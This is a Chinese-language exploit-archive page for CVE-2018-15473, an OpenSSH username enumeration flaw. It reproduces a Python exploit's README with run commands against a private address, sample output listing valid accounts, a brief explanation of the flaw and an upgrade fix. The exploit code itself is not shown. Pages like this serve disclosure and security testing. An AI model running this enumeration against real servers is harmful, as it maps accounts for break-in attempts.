POC详情: bcd3d695ae83d63a9616fd2372ac7ae602e3cc91

来源
关联漏洞
标题: OpenSSH 竞争条件问题漏洞 (CVE-2018-15473)
描述:OpenSSH(OpenBSD Secure Shell)是OpenBSD计划组的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现,支持对所有的传输进行加密,可有效阻止窃听、连接劫持以及其他网络级的攻击。 OpenSSH 7.7及之前版本中存在竞争条件问题漏洞。该漏洞源于网络系统或产品在运行过程中,并发代码需要互斥地访问共享资源时,对于并发访问的处理不当。
描述
OpenSSH 2.3 < 7.7 - Username Enumeration
介绍
## CVE-2018-15473 
**SSH-Username-Enumeration-Exploit (OpenSSH 2.3 < 7.7)**

Edited version of the original exploit: https://www.exploit-db.com/exploits/45233

* Converted to Python3
* Added username wordlist option

## How To Run

```bash
#Ensure that you install the requirements:
foo@bar:~$ pip3 install -r requirements.txt
```

```bash
#For single username:
foo@bar:~$ ./CVE-2018-15473.py 192.168.1.20 -u root
[+] root is a valid username
```

```bash      
#For multiple username:
foo@bar:~$ ./CVE-2018-15473.py 192.168.1.20 -w username_wordlist.txt
[+] root is a valid username
[-] mysql is an invalid username
[-] mike is an invalid username
[-] foo is an invalid username
[-] bar is an invalid username
Valid Users: 
root
```

```bash      
#For more option:
foo@bar:~$ ./CVE-2018-15473.py -h
```

## About the Vulnerability:

The system responds differently to valid and invalid authentication attempts. A remote user can send specially crafted requests to determine valid usernames on the target system. Thus, a remote user can determine valid usernames on the target system.

## Solution:

OpenSSH server should be upgraded to, or higher than, version 7.7
文件快照

[4.0K] /data/pocs/bcd3d695ae83d63a9616fd2372ac7ae602e3cc91 ├── [3.1K] CVE-2018-15473.py ├── [1.1K] README.md └── [ 18] requirements.txt 0 directories, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。